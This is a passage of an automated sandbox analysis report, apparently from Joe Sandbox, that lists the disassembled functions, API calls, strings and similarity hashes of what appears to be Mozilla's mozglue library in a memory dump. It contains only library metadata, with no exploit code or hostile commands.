                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C8D4A68), ref: 6C90945E
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C909470
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C909482
                                                                    • Part of subcall function 6C909420: __Init_thread_footer.LIBCMT ref: 6C90949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90EC84
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C90EC8C
                                                                    • Part of subcall function 6C9094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9094EE
                                                                    • Part of subcall function 6C9094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C909508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90ECA1
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90ECAE
                                                                  • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C90ECC5
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90ED0A
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C90ED19
                                                                  • CloseHandle.KERNEL32(?), ref: 6C90ED28
                                                                  • free.MOZGLUE(00000000), ref: 6C90ED2F
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90ED59
                                                                  Strings
                                                                  • [I %d/%d] profiler_ensure_started, xrefs: 6C90EC94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                  • String ID: [I %d/%d] profiler_ensure_started
                                                                  • API String ID: 4057186437-125001283
                                                                  • Opcode ID: 80e625195f5a6d3ce700ddf3a7a3924a6d638371303346abba13ffdd49ab1ed6
                                                                  • Instruction ID: 4300baa44cfb899f7884e586702d5f4afda6f6805309125987067d0e089577c7
                                                                  • Opcode Fuzzy Hash: 80e625195f5a6d3ce700ddf3a7a3924a6d638371303346abba13ffdd49ab1ed6
                                                                  • Instruction Fuzzy Hash: 2621E575704515ABDB00AF64D808AAA7779EB9636CF208218FD1897B41DB31D815CBE1
                                                                  APIs
                                                                    • Part of subcall function 6C8CEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8CEB83
                                                                  • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C90B392,?,?,00000001), ref: 6C9091F4
                                                                    • Part of subcall function 6C8FCBE8: GetCurrentProcess.KERNEL32(?,6C8C31A7), ref: 6C8FCBF1
                                                                    • Part of subcall function 6C8FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8C31A7), ref: 6C8FCBFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                  • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                  • API String ID: 3790164461-3347204862
                                                                  • Opcode ID: 49726d8b343ebb4d1d6d7a1b60d4228b81ae522216f74a9e798538f75b70c39f
                                                                  • Instruction ID: 4f5ad44be6fe55f8865ec4e7cfa17303fdcc3662ca309083b24238475d545a2c
                                                                  • Opcode Fuzzy Hash: 49726d8b343ebb4d1d6d7a1b60d4228b81ae522216f74a9e798538f75b70c39f
                                                                  • Instruction Fuzzy Hash: 54B1E2B1B012099BDB14CF98C5527AEBBB6BF85308F11442DD506ABF80D731EA45CBD1
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C8EC5A3
                                                                  • WideCharToMultiByte.KERNEL32 ref: 6C8EC9EA
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C8EC9FB
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C8ECA12
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8ECA2E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8ECAA5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                  • String ID: (null)$0
                                                                  • API String ID: 4074790623-38302674
                                                                  • Opcode ID: b0b70ffe5a6504c32530a07bbc0c1b242a93fe26ce92641f4d1f7b40b73bd94c
                                                                  • Instruction ID: 111f96419af2585c02af25a6e8b52fda5e0c07145ab697d37825e4b15d0ea2b7
                                                                  • Opcode Fuzzy Hash: b0b70ffe5a6504c32530a07bbc0c1b242a93fe26ce92641f4d1f7b40b73bd94c
                                                                  • Instruction Fuzzy Hash: 9EA17F30A093419FDB20EF28C65475BBBE1BFCA748F148D1DE89997652D731D809CB92
                                                                  APIs
                                                                  • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C8EC784
                                                                  • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8EC801
                                                                  • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C8EC83D
                                                                  • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C8EC891
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                  • String ID: INF$NAN$inf$nan
                                                                  • API String ID: 1991403756-4166689840
                                                                  • Opcode ID: a43dffb4c715a226fdcb4ea5f32cd8e70e4386ffa9ec6602e2f6e5d53cb110bd
                                                                  • Instruction ID: 256fd0b780b3ca5ff2e25be329062a8a340f9b8f3beb4d8d91dcfff4bbf224ae
                                                                  • Opcode Fuzzy Hash: a43dffb4c715a226fdcb4ea5f32cd8e70e4386ffa9ec6602e2f6e5d53cb110bd
                                                                  • Instruction Fuzzy Hash: 4F518371A087548BD710AF2CC68169AFBF0BF9E308F008E2DE9D597651E770D9888B43
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: free$moz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 3009372454-0
                                                                  • Opcode ID: 78000e9e6e5e0396fefe9b24ed16cfb4fe775e873ef5dbffb8ce3a7e3130b357
                                                                  • Instruction ID: 022b693a3ff58067c334772c1ccedbb5a6eff5bd28876f3d1a51a38d803b2148
                                                                  • Opcode Fuzzy Hash: 78000e9e6e5e0396fefe9b24ed16cfb4fe775e873ef5dbffb8ce3a7e3130b357
                                                                  • Instruction Fuzzy Hash: 27B1D371B001158FDB289F6CDAD077D76B1AFC6328F184A79E416DBB86D731D8808B42
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                  • String ID:
                                                                  • API String ID: 1192971331-0
                                                                  • Opcode ID: b29d350b205cd1a8de1f19429e81b2ecc5c3d5f07675ce5f748be82c93edfc30
                                                                  • Instruction ID: 63273c2d6ab57ec78807bad566d96b3b63d139f4de0331e236bf8ee9e3ad7a9b
                                                                  • Opcode Fuzzy Hash: b29d350b205cd1a8de1f19429e81b2ecc5c3d5f07675ce5f748be82c93edfc30
                                                                  • Instruction Fuzzy Hash: 38316FB1A087448FDB00FF7CD64866EBBF0BF85309F11892DE99987215EB749458CB82
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C8D9675
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D9697
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C8D96E8
                                                                  • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C8D9707
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D971F
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C8D9773
                                                                    • Part of subcall function 6C8FAB89: EnterCriticalSection.KERNEL32(6C94E370,?,?,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284), ref: 6C8FAB94
                                                                    • Part of subcall function 6C8FAB89: LeaveCriticalSection.KERNEL32(6C94E370,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8FABD1
                                                                  • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C8D97B7
                                                                  • FreeLibrary.KERNEL32 ref: 6C8D97D0
                                                                  • FreeLibrary.KERNEL32 ref: 6C8D97EB
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C8D9824
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                  • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                  • API String ID: 409848716-3880535382
                                                                  • Opcode ID: dbacb523c396302ef7b4fc9cd6b1ac8f5cf65102aae3e67cca0e9d6f3e9e5a87
                                                                  • Instruction ID: 5d3fb33f1c3c9f3f6bfe868eedf552c258576cc79ee6d6909e255a609fc6364f
                                                                  • Opcode Fuzzy Hash: dbacb523c396302ef7b4fc9cd6b1ac8f5cf65102aae3e67cca0e9d6f3e9e5a87
                                                                  • Instruction Fuzzy Hash: 2341E3757042029BDF10EFA5DA94A9A7BB0EB8A76CF218928ED1587740D734E805CBA1
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C94E784), ref: 6C8C1EC1
                                                                  • LeaveCriticalSection.KERNEL32(6C94E784), ref: 6C8C1EE1
                                                                  • EnterCriticalSection.KERNEL32(6C94E744), ref: 6C8C1F38
                                                                  • LeaveCriticalSection.KERNEL32(6C94E744), ref: 6C8C1F5C
                                                                  • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C8C1F83
                                                                  • LeaveCriticalSection.KERNEL32(6C94E784), ref: 6C8C1FC0
                                                                  • EnterCriticalSection.KERNEL32(6C94E784), ref: 6C8C1FE2
                                                                  • LeaveCriticalSection.KERNEL32(6C94E784), ref: 6C8C1FF6
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C8C2019
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                  • String ID: MOZ_CRASH()
                                                                  • API String ID: 2055633661-2608361144
                                                                  • Opcode ID: aa8c660052fecd92ae125a0b53f26aad563a29551c98cb9ee9f9e81aadd4acb8
                                                                  • Instruction ID: 2a260bfc85d0b3ef35630e783c9d1252711bc543c9824b5a41135879a9f164cc
                                                                  • Opcode Fuzzy Hash: aa8c660052fecd92ae125a0b53f26aad563a29551c98cb9ee9f9e81aadd4acb8
                                                                  • Instruction Fuzzy Hash: B141F375B093198BDB20EF78C988B6E7AB5EB8975CF108425E91497741DB70D8048BD2
                                                                  APIs
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C8D4A68), ref: 6C90945E
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C909470
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C909482
                                                                    • Part of subcall function 6C909420: __Init_thread_footer.LIBCMT ref: 6C90949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C910039
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C910041
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C910075
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C910082
                                                                  • moz_xmalloc.MOZGLUE(00000048), ref: 6C910090
                                                                  • free.MOZGLUE(?), ref: 6C910104
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C91011B
                                                                  Strings
                                                                  • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C91005B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                  • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                  • API String ID: 3012294017-637075127
                                                                  • Opcode ID: 7fe7bb45d9fa06f04d18f009ef53d4536c1266b8cdfcbdac09a070f565cb483a
                                                                  • Instruction ID: 68b49feecd5a09bb137947efc5ab6bf7e4b26625090ca0d0f605c99d4b091023
                                                                  • Opcode Fuzzy Hash: 7fe7bb45d9fa06f04d18f009ef53d4536c1266b8cdfcbdac09a070f565cb483a
                                                                  • Instruction Fuzzy Hash: 5B41CFB1604709DFCB20DF28C844A9ABBF0FF49328F50892DE95A83B40DB31E914CB91
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8D7EA7
                                                                  • malloc.MOZGLUE(00000001), ref: 6C8D7EB3
                                                                    • Part of subcall function 6C8DCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C8DCB49
                                                                    • Part of subcall function 6C8DCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C8DCBB6
                                                                  • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C8D7EC4
                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C8D7F19
                                                                  • malloc.MOZGLUE(?), ref: 6C8D7F36
                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8D7F4D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                  • String ID: d
                                                                  • API String ID: 204725295-2564639436
                                                                  • Opcode ID: 4eb2566241d7a3d5f849481f13a9f6790e95b3a3811484e3058ead1b5c6a9e0d
                                                                  • Instruction ID: 7336f6e121e7f7d013e21d708f7d1f576cae384a812bf043539ec17bf089d35d
                                                                  • Opcode Fuzzy Hash: 4eb2566241d7a3d5f849481f13a9f6790e95b3a3811484e3058ead1b5c6a9e0d
                                                                  • Instruction Fuzzy Hash: 3B311862E0439897DF10DB68CD049FEB778EF96208F159668DC4957712FB30E988C391
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C8D3EEE
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C8D3FDC
                                                                  • RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6C8D4006
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C8D40A1
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C8D3CCC), ref: 6C8D40AF
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C8D3CCC), ref: 6C8D40C2
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C8D4134
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6C8D3CCC), ref: 6C8D4143
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6C8D3CCC), ref: 6C8D4157
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Free$Heap$StringUnicode$Allocate
                                                                  • String ID:
                                                                  • API String ID: 3680524765-0
                                                                  • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                  • Instruction ID: 895b2d064b8772854dd7a265b184bfd09cf8421a0c06f2a9d8ce70bf9f58b838
                                                                  • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                  • Instruction Fuzzy Hash: 36A1A0B1A00215CFDB50CF68C9C0659B7B5FF98308F2649A9D909AF702D771ED86CBA1
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(8E8DFFFF,?,6C90483A,?), ref: 6C8C4ACB
                                                                  • memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6C90483A,?), ref: 6C8C4AE0
                                                                  • moz_xmalloc.MOZGLUE(FFFE15BF,?,6C90483A,?), ref: 6C8C4A82
                                                                    • Part of subcall function 6C8DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C8DCAA2
                                                                  • memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6C90483A,?), ref: 6C8C4A97
                                                                  • moz_xmalloc.MOZGLUE(15D4E801,?,6C90483A,?), ref: 6C8C4A35
                                                                    • Part of subcall function 6C8DCA10: malloc.MOZGLUE(?), ref: 6C8DCA26
                                                                  • memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6C90483A,?), ref: 6C8C4A4A
                                                                  • moz_xmalloc.MOZGLUE(15D4E824,?,6C90483A,?), ref: 6C8C4AF4
                                                                  • moz_xmalloc.MOZGLUE(FFFE15E2,?,6C90483A,?), ref: 6C8C4B10
                                                                  • moz_xmalloc.MOZGLUE(8E8E0022,?,6C90483A,?), ref: 6C8C4B2C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                  • String ID:
                                                                  • API String ID: 4251373892-0
                                                                  • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                  • Instruction ID: e89aebef034a5d52d93ba501cbc05a5bf85aaa7bf332769e929e75670b9e0c31
                                                                  • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                  • Instruction Fuzzy Hash: B1717DB1A007069FC724CF68C580AAAB7F5FF98304B104A3ED15A9BB51E731F599CB81
                                                                  APIs
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C918273), ref: 6C919D65
                                                                  • free.MOZGLUE(6C918273,?), ref: 6C919D7C
                                                                  • free.MOZGLUE(?,?), ref: 6C919D92
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C919E0F
                                                                  • free.MOZGLUE(6C91946B,?,?), ref: 6C919E24
                                                                  • free.MOZGLUE(?,?,?), ref: 6C919E3A
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C919EC8
                                                                  • free.MOZGLUE(6C91946B,?,?,?), ref: 6C919EDF
                                                                  • free.MOZGLUE(?,?,?,?), ref: 6C919EF5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                  • String ID:
                                                                  • API String ID: 956590011-0
                                                                  • Opcode ID: 8409908da3d9265d274943ea2d9ad14b535d17b50277b4e70c26dc0e4a336d88
                                                                  • Instruction ID: 17f63ad44d2b52143dfade0811f1ca755d1408d3294113c8d07dbf8a148aa50a
                                                                  • Opcode Fuzzy Hash: 8409908da3d9265d274943ea2d9ad14b535d17b50277b4e70c26dc0e4a336d88
